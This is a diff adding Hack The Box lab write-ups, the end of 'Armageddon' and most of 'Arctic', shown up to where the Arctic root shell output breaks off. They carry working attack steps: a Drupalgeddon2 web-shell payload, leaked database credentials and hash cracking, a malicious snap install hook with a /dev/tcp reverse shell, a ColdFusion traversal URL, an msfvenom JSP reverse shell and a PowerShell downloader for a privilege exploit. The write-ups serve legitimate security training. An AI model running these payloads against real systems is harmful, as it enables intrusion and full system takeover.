+ [*] --==[::#Drupalggedon2::]==--
+ --------------------------------------------------------------------------------
+ [i] Target : http://10.129.48.89/
+ --------------------------------------------------------------------------------
+ [+] Found : http://10.129.48.89/CHANGELOG.txt (HTTP Response: 200)
+ [+] Drupal!: v7.56
+ --------------------------------------------------------------------------------
+ [*] Testing: Form (user/password)
+ [+] Result : Form valid
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ [*] Testing: Clean URLs
+ [!] Result : Clean URLs disabled (HTTP Response: 404)
+ [i] Isn't an issue for Drupal v7.x
+ --------------------------------------------------------------------------------
+ [*] Testing: Code Execution (Method: name)
+ [i] Payload: echo UJNQTJEV
+ [+] Result : UJNQTJEV
+ [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
+ --------------------------------------------------------------------------------
+ [*] Testing: Existing file (http://10.129.48.89/shell.php)
+ [i] Response: HTTP 404 // Size: 5
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ [*] Testing: Writing To Web Root (./)
+ [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
+ [+] Result : <****?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2> &1' ); }
+ [+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
+ --------------------------------------------------------------------------------
+ [i] Fake PHP shell: curl 'http://10.129.48.89/shell.php' -d 'c=hostname'
+ armageddon.htb>>
+
+
+
+And it looks like we have a shell! however we see that it's not easy to navigate the system with it because of how limited it is:
+
+
+ armageddon.htb>> ls -lash
+ total 288K
+ 4.0K drwxr-xr-x. 9 apache apache 4.0K Aug 5 14:41 .
+ 0 drwxr-xr-x. 4 root root 33 Dec 3 2020 ..
+ 4.0K -rw-r--r--. 1 apache apache 317 Jun 21 2017 .editorconfig
+ 4.0K -rw-r--r--. 1 apache apache 174 Jun 21 2017 .gitignore
+ 8.0K -rw-r--r--. 1 apache apache 6.0K Jun 21 2017 .htaccess
+ 112K -rw-r--r--. 1 apache apache 109K Jun 21 2017 CHANGELOG.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.5K Jun 21 2017 COPYRIGHT.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.7K Jun 21 2017 INSTALL.mysql.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.9K Jun 21 2017 INSTALL.pgsql.txt
+ 4.0K -rw-r--r--. 1 apache apache 1.3K Jun 21 2017 INSTALL.sqlite.txt
+ 20K -rw-r--r--. 1 apache apache 18K Jun 21 2017 INSTALL.txt
+ 20K -rw-r--r--. 1 apache apache 18K Nov 16 2016 LICENSE.txt
+ 12K -rw-r--r--. 1 apache apache 8.6K Jun 21 2017 MAINTAINERS.txt
+ 8.0K -rw-r--r--. 1 apache apache 5.3K Jun 21 2017 README.txt
+ 12K -rw-r--r--. 1 apache apache 9.9K Jun 21 2017 UPGRADE.txt
+ 8.0K -rw-r--r--. 1 apache apache 6.5K Jun 21 2017 authorize.php
+ 4.0K -rw-r--r--. 1 apache apache 720 Jun 21 2017 cron.php
+ 4.0K drwxr-xr-x. 4 apache apache 4.0K Jun 21 2017 includes
+ 4.0K -rw-r--r--. 1 apache apache 529 Jun 21 2017 index.php
+ 4.0K -rw-r--r--. 1 apache apache 703 Jun 21 2017 install.php
+ 4.0K drwxr-xr-x. 4 apache apache 4.0K Dec 4 2020 misc
+ 4.0K drwxr-xr-x. 42 apache apache 4.0K Jun 21 2017 modules
+ 0 drwxr-xr-x. 5 apache apache 70 Jun 21 2017 profiles
+ 4.0K -rw-r--r--. 1 apache apache 2.2K Jun 21 2017 robots.txt
+ 0 drwxr-xr-x. 2 apache apache 261 Jun 21 2017 scripts
+ 4.0K -rw-r--r--. 1 apache apache 75 Aug 5 14:41 shell.php
+ 0 drwxr-xr-x. 4 apache apache 75 Jun 21 2017 sites
+ 0 drwxr-xr-x. 7 apache apache 94 Jun 21 2017 themes
+ 20K -rw-r--r--. 1 apache apache 20K Jun 21 2017 update.php
+ 4.0K -rw-r--r--. 1 apache apache 2.2K Jun 21 2017 web.config
+ 4.0K -rw-r--r--. 1 apache apache 417 Jun 21 2017 xmlrpc.php
+ armageddon.htb>> pwd
+ /var/www/html
+ armageddon.htb>> cd sites
+
+ armageddon.htb>> pwd
+ /var/www/html
+
+ armageddon.htb>> which cd
+ /usr/bin/cd
+
+
+
+As you can see we can't use the cd command to change directories. But that's not an issue so we navigate to **sites/default/settings.php**
+
+
+ armageddon.htb>> cat sites/default/settings.php
+ <****?php
+
+ [...]
+
+ $databases = array (
+ 'default' =>
+ array (
+ 'default' =>
+ array (
+ 'database' => 'drupal',
+ 'username' => 'drupaluser',
+ 'password' => 'CQHEy@9M*m23gBVj',
+ 'host' => 'localhost',
+ 'port' => '',
+ 'driver' => 'mysql',
+ 'prefix' => '',
+ ),
+ ),
+ );
+
+ [...]
+
+ ?>
+
+ armageddon.htb>> cat /etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ adm:x:3:4:adm:/var/adm:/sbin/nologin
+ lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ sync:x:5:0:sync:/sbin:/bin/sync
+ shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ halt:x:7:0:halt:/sbin:/sbin/halt
+ mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ operator:x:11:0:operator:/root:/sbin/nologin
+ games:x:12:100:games:/usr/games:/sbin/nologin
+ ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ nobody:x:99:99:Nobody:/:/sbin/nologin
+ systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+ dbus:x:81:81:System message bus:/:/sbin/nologin
+ polkitd:x:999:998:User for polkitd:/:/sbin/nologin
+ sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+ postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+ apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
+ mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
+ brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
+
+now here we seem to have credentials for a mysql database, however the drupaluser doesn't appear in /etc/passwd, therefore we probably need to get password hashes from the database itself:
+
+
+ armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'
+ name pass
+
+ brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
+
+
+
+now here we have a password hash, so let's crack it with john:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → vim hash.txt
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → cat hash.txt
+ $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → john hash.txt -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
+ Cost 1 (iteration count) is 32768 for all loaded hashes
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ booboo (?)
+ 1g 0:00:00:00 DONE (2021-08-09 11:30) 2.439g/s 585.3p/s 585.3c/s 585.3C/s tiffany..chris
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And we have brucetherealadmin's password! Now let's try to login via SSH:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/20 ] [~/HTB/Armageddon]
+ → ssh brucetherealadmin@10.129.48.89
+ The authenticity of host '10.129.48.89 (10.129.48.89)' can't be established.
+ ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.129.48.89' (ECDSA) to the list of known hosts.
+ brucetherealadmin@10.129.48.89's password:
+ Last login: Tue Mar 23 12:40:36 2021 from 10.10.14.2
+ [brucetherealadmin@armageddon ~]$ id
+ uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+ [brucetherealadmin@armageddon ~]$ ls -lash
+ total 16K
+ 0 drwx------. 2 brucetherealadmin brucetherealadmin 99 Dec 14 2020 .
+ 0 drwxr-xr-x. 3 root root 31 Dec 3 2020 ..
+ 0 lrwxrwxrwx. 1 root root 9 Dec 11 2020 .bash_history -> /dev/null
+ 4.0K -rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 Apr 1 2020 .bash_logout
+ 4.0K -rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 Apr 1 2020 .bash_profile
+ 4.0K -rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 Apr 1 2020 .bashrc
+ 4.0K -r--------. 1 brucetherealadmin brucetherealadmin 33 Aug 9 10:03 user.txt
+ [brucetherealadmin@armageddon ~]$ cat user.txt
+ 58XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to login and get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root flag. We first need to enumerate the box, to do so we can use linpeas.sh:
+
+
+ [terminal 1]
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → cp /home/nothing/HTB/Academy/linpeas.sh .
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [terminal 2]
+ [brucetherealadmin@armageddon ~]$ curl http://10.10.14.34:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 120k 0 0:00:02 0:00:02 --:--:-- 120k
+ [brucetherealadmin@armageddon ~]$ chmod +x /tmp/peas.sh
+ [brucetherealadmin@armageddon ~]$ /tmp/peas.sh
+
+
+
+` 
+
+Let it run, and then when we check the output we see the following:
+
+
+
+Looks like we are able to run **snap** as the root user without any password, therefore let's use the [gtfobin](https://gtfobins.github.io/gtfobins/snap/) for snap:
+
+
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → sudo gem install fpm
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → COMMAND='bash -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"'
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Armageddon]
+ → cd $(mktemp -d)
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → mkdir meta/hooks/ -p
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → chmod +x meta/hooks/install
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → fpm -n privesc -s dir -t snap -a all meta
+ Created package {:path=>"privesc_1.0_all.snap"}
+
+
+
+Now we upload the malicious privesc snap file to the machine and run it:
+
+
+ [term1]
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → ls -lash
+ total 16K
+ 4.0K drwx------ 3 nothing nothing 4.0K Aug 9 12:40 .
+ 4.0K drwxrwxrwt 23 root root 4.0K Aug 9 12:40 ..
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 9 12:40 meta
+ 4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 9 12:40 privesc_1.0_all.snap
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → md5sum privesc_1.0_all.snap
+ 1159d305989905e39a5f9a8e63ba35ed privesc_1.0_all.snap
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [/tmp/tmp.uYjIjYciPg]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ [brucetherealadmin@armageddon ~]$ curl http://10.10.14.34:9090/privesc_1.0_all.snap > /tmp/privesc.snap
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 4096 100 4096 0 0 4446 0 --:--:-- --:--:-- --:--:-- 4452
+ [brucetherealadmin@armageddon ~]$ md5sum /tmp/privesc.snap
+ 1159d305989905e39a5f9a8e63ba35ed /tmp/privesc.snap
+
+
+
+both the file hashes match therefore the transfer was successful. Now let's run snap as the root user to make use of the snap package we created:
+
+
+ [term 1]
+
+ [brucetherealadmin@armageddon tmp]$ sudo snap install /tmp/privesc.snap --dangerous --devmode
+ Run install hook of "privesc" snap if present
+
+ [term 2]
+
+ [ 10.10.14.34/23 ] [ /dev/pts/7 ] [/tmp/tmp.uYjIjYciPg]
+ → nc -lvnp 9001
+ Listening on 0.0.0.0 9001
+ Connection received on 10.129.48.89 57430
+ bash: cannot set terminal process group (18084): Inappropriate ioctl for device
+ bash: no job control in this shell
+ bash-4.3# id
+ id
+ uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
+ bash-4.3# cat /root/root.txt
+ cat /root/root.txt
+ 34XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/6.md b/Easy/6.md
new file mode 100644
index 0000000..b666bf5
--- /dev/null
+++ b/Easy/6.md
@@ -0,0 +1,385 @@
+# Arctic Writeup
+
+
+
+## Introduction :
+
+Arctic is an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. The additional -Pn tells nmap that to skip the ping probes, because the box could be blocking them and because we know that the box is actually online.
+
+
+ **λ nihilist [~/_HTB/Beep] → nmap 10.10.10.11 -sC -sV -Pn**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 21:58 CET
+ Nmap scan report for 10.10.10.11
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 8500/tcp open fmtp?
+ 49154/tcp open msrpc Microsoft Windows RPC
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 133.85 seconds
+
+
+
+We don't get that much to work with, but we will investigate the 8500th port for the next part.
+
+## **Part 2 : Getting User Access**
+
+Let's investigate the 8500th port by checking what lies at the following url : http://10.10.10.11:8500/
+
+We'll test it by opening up our web browser, and using the curl command. Let's use the following syntax : **curl -vsk http://10.10.10.11:8500**
+
+
+ **λ nihilist [ 127.0.0.1 ] [~] → curl --help**
+ -k, --insecure Allow insecure server connections when using SSL
+ -s, --silent Silent mode
+ -v, --verbose Make the operation more talkative
+
+
+
+ **λ nihilist [ 127.0.0.1 ] [~] → curl -vsk http://10.10.10.11:8500/**
+ * Trying 10.10.10.11:8500...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.11 (10.10.10.11) port 8500 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.11:8500
+ > User-Agent: curl/7.66.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 200 OK
+ < Date: Tue, 12 Nov 2019 17:38:14 GMT
+ < Content-Type: text/html; charset=utf-8
+ < Connection: close
+ **< Server: JRun Web Server**
+ <
+
+ [Webpage Sourcecode [...]]
+
+
+Now we know that 10.10.10.11 is running JRun Web Server at the port 8500. let's open it using our web browser to see what we can do there.
+
+  
+
+By opening up the aforementioned URL in our web browser, we navigate to a ColdFusion8 login page through the directories **cfide/administrator**. By doing a quick searchsploit command using the keyword Coldfusion, we see that the service may be vulnerable to Directory Traversal Attacks.
+
+
+ **λ nihilist [ 127.0.0.1 ] [~] → searchsploit ColdFusion 8**
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ **Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb**
+ Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
+ Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cr | exploits/cfm/webapps/33170.txt
+ Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.c | exploits/cfm/webapps/33167.txt
+ Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query | exploits/cfm/webapps/33169.txt
+ Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?sta | exploits/cfm/webapps/33168.txt
+ Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remo | exploits/windows/remote/43993.py
+ ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
+ ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
+ Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | exploits/multiple/remote/22867.pl
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+By navigating to the exploit n°16985 on exploitdb, we see that we should be able to try a certain URL exploiting Coldfusion's assumed Directory Traversal Vulnerability. The URL to be tried is the following :
+
+
+ http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en
+
+
+You can see that this is indeed a Directory Traversal Vulnerability, because it is using the **../** special characters to change directory, going up the directory tree, in order to reach the root **/** directory. The difference with Local File Inclusion vulnerabilities, is that you have to use **../** to go up the directory tree. with LFI you could start with the root folder / and go down from there e.g : **/etc/passwd** The URL ends with a null byte ( **%00**) in order to end the string. For example: myCoolScript.php%00.txt - Meets .txt, but is going to execute .php for that matter, the "en" is there to meet the script's requirement but it ends right before that thanks to the null byte.
+
+
+
+Although the RFI (Remote File Inclusion) Vulnerability would allow us much more flexibility in terms of exploiting vulnerable targets, they remain very rare, because it is very easy to make sure that there is no http in the include page.
+
+(Special Thanks to Reelix for the technical details.)
+
+
+
+The Directory Traversal Vulnerability was successful, now we have a Hash to work with. We will be using the hash-identifier command to identify the hash's encryption algorithm.
+
+
+ λ nihilist [ 127.0.0.1 ] [~] → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: **2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03**
+
+ Possible Hashs:
+ **[+] SHA-1**
+ [+] MySQL5 - SHA-1(SHA-1($pass))
+
+
+Paste the Hash into your favorite web-browser along with the SHA-1 keyword, and you should easily find the original "happyday" password.
+
+
+
+We will now log into the ColdFusion8 Login form using our freshly-acquired credentials **admin:happyday**
+
+
+
+Once on the coldfusion Dashboard, logged in as admin, we will upload a reverse shell tcp that we will generate using the msfvenom command, naming it as shell.jsp. The Scheduled task will download the shell.jsp payload , so we will need python to run the http server for us within a second terminal. We will upload it as a scheduled task, browse to it within our web browser, and catch the incoming reverse shell connection using the netcat command.
+
+_Terminal n°1:_
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Arctic] → msfvenom -p java/jsp_shell_reverse_tcp \
+ > LHOST=10.10.14.48 \
+ > LPORT=443 \
+ > -f raw > shell.jsp**
+ Payload size: 1496 bytes
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Arctic] → su**
+ Password:
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → nc -lvnp 443**
+
+
+ _Terminal n°2:_
+
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → python -m http.server 8000**
+ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
+ 10.10.10.11 - - [11/Nov/2019 13:57:02] "GET /shell.jsp HTTP/1.1" 200 -
+
+
+The box successfully downloaded our shell.jsp ! now we will browse to it , and observe our first terminal receieve the shell connection.
+
+ _Terminal n°1:_
+
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → nc -lvnp 443**
+ ls
+ Connection from 10.10.10.11:54438
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ **C:\ColdFusion8\runtime\bin>whoami**
+ whoami
+ arctic\tolis
+
+
+We now have a reverse shell, logged as the user tolis, we can now print out the user flag.
+
+
+ **C:\ColdFusion8\runtime\bin>more C:\Users\tolis\Desktop\user.txt**
+
+ more C:\Users\tolis\Desktop\user.txt
+ 02XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Part 3 : Getting Root Access**
+
+Now we need to escalate privileges onto the box. For that matter we can use a binary named "chimichurri.exe" which takes advantage of the vulnerability MS10-059 available on this machine, we can verify it by typing in the **systeminfo** command
+
+
+ **C:\ColdFusion8\runtime\bin>systeminfo**
+ systeminfo
+
+ Host Name: ARCTIC
+ **OS Name: Microsoft Windows Server 2008 R2 Standard**
+ OS Version: 6.1.7600 N/A Build 7600
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 55041-507-9857321-84451
+ Original Install Date: 22/3/2017, 11:09:45 ��
+ System Boot Time: 12/11/2019, 1:11:38 ��
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 2 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: el;Greek
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
+ Total Physical Memory: 1.023 MB
+ Available Physical Memory: 370 MB
+ Virtual Memory: Max Size: 2.047 MB
+ Virtual Memory: Available: 1.281 MB
+ Virtual Memory: In Use: 766 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: HTB
+ Logon Server: N/A
+ **Hotfix(s): N/A**
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.11
+
+
+We see that this machine is vulnerable to the aforementionned binary exploit, because : -it is running Microsoft Windows Server 2008 R2 -There are no Hotfixes installed on the machine.
+
+The lack of Hotfixes indicates a serious lack of security, which would allow an attacker (us) to escalate priveleges on the machine.
+
+As it is detailed in this [bulletin report](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-059), the hotfix KB982799 is required to fix the MS10-059 vulnerability
+
+To be able to get chimmichurri.exe on this machine, we will need to write a ps1 script that will download the binary on our machine, serving a simple http server with python. to be able to execute our privesc binary we first need to check if we can write .ps1 files on the machine.
+
+
+ **C:\ColdFusion8\runtime\bin>echo test >> xd.ps1**
+ echo test >> xd.ps1
+
+ C:\ColdFusion8\runtime\bin>more xd.ps1
+ more xd.ps1
+ test
+
+
+We have been able to put the line "test" into our ps1 file named xd.
+
+Now we will make a file named wget.ps1 that will contain the lines required to download chimmichurri.exe from 10.10.14.48 (our local machine).
+
+_Terminal 1:_
+
+
+ **C:\ColdFusion8\runtime\bin>echo $webclient = New-Object System.Net.WebClient >> wget.ps1**
+ echo $webclient = New-Object System.Net.WebClient >> wget.ps1
+
+ **C:\ColdFusion8\runtime\bin>dir**
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is F88F-4EA5
+
+ Directory of C:\ColdFusion8\runtime\bin
+
+ 12/11/2019 11:22 �� **IR> .
+ 12/11/2019 11:22 �� **IR> ..
+ 18/03/2008 11:11 �� 64.512 java2wsdl.exe
+ 19/01/2008 09:59 �� 2.629.632 jikes.exe
+ 18/03/2008 11:11 �� 64.512 jrun.exe
+ 18/03/2008 11:11 �� 71.680 jrunsvc.exe
+ 18/03/2008 11:11 �� 5.120 jrunsvcmsg.dll
+ 18/03/2008 11:11 �� 64.512 jspc.exe
+ 22/03/2017 08:53 �� 1.804 jvm.config
+ 18/03/2008 11:11 �� 64.512 migrate.exe
+ 18/03/2008 11:11 �� 34.816 portscan.dll
+ 18/03/2008 11:11 �� 64.512 sniffer.exe
+ 12/11/2019 11:22 �� 47 wget.ps1
+ 18/03/2008 11:11 �� 78.848 WindowsLogin.dll
+ 18/03/2008 11:11 �� 64.512 wsconfig.exe
+ 22/03/2017 08:53 �� 1.013 wsconfig_jvm.config
+ 18/03/2008 11:11 �� 64.512 wsdl2java.exe
+ 12/11/2019 11:18 �� 7 xd.ps1
+ 18/03/2008 11:11 �� 64.512 xmlscript.exe
+ 17 File(s) 3.339.063 bytes
+ 2 Dir(s) 33.189.847.040 bytes free
+
+ **C:\ColdFusion8\runtime\bin>more wget.ps1**
+ more wget.ps1
+ $webclient = New-Object System.Net.WebClient
+
+ **C:\ColdFusion8\runtime\bin>echo $url = "http://10.10.14.48:8000/ChimiChurri.exe" >> wget.ps1**
+ echo $url = "http://10.10.14.48:8000/ChimiChurri.exe" >> wget.ps1
+
+ **C:\ColdFusion8\runtime\bin>more wget.ps1**
+ more wget.ps1
+ $webclient = New-Object System.Net.WebClient
+ $url = "http://10.10.14.48:8000/ChimiChurri.exe"
+
+ **C:\ColdFusion8\runtime\bin>echo $file = "exploit.exe" >> wget.ps1**
+ echo $file = "exploit.exe" >> wget.ps1
+
+ **C:\ColdFusion8\runtime\bin>echo $webclient.DownloadFile($url,$file) >> wget.ps1**
+ echo $webclient.DownloadFile($url,$file) >> wget.ps1
+
+
+
+ **C:\ColdFusion8\runtime\bin>more wget.ps1**
+ more wget.ps1
+ $webclient = New-Object System.Net.WebClient
+ $url = "http://10.10.14.48:8000/ChimiChurri.exe"
+ $file = "exploit.exe"
+ $webclient.DownloadFile($url,$file)
+
+
+
+ **C:\ColdFusion8\runtime\bin>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1**
+ powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
+ ^CExiting.
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → nc -lvnp 443**
+ Connection from 10.10.10.11:54538
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ **C:\ColdFusion8\runtime\bin>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1**
+ powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
+
+
+
+_Terminal 2:_
+
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → python -m http.server 8000**
+ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
+ 10.10.10.11 - - [11/Nov/2019 14:25:32] "GET /shell.jsp HTTP/1.1" 200 -
+ 10.10.10.11 - - [11/Nov/2019 14:26:37] "GET /ChimiChurri.exe HTTP/1.1" 200 -
+
+
+The download has been successful ! Now all that we need to do is launch exploit.exe and recieve the elevated privilege reverse shell to our third terminal with the netcat command.
+
+_Terminal 1:_
+
+
+ **C:\ColdFusion8\runtime\bin>exploit.exe 10.10.14.48 9001**
+ exploit.exe 10.10.14.48 9001
+ /Chimichurri/-->This exploit gives you a Local System shell
+ /Chimichurri/-->Changing registry values...
+ /Chimichurri/-->Got SYSTEM token...
+ /Chimichurri/-->Running reverse shell...
+ /Chimichurri/-->Restoring default registry values...
+
+
+
+_Terminal 3:_
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~] → nc -lvnp 9001**
+ whoami
+ Connection from 10.10.10.11:54563
+ Microsoft Windows [Version 6.1.7600]
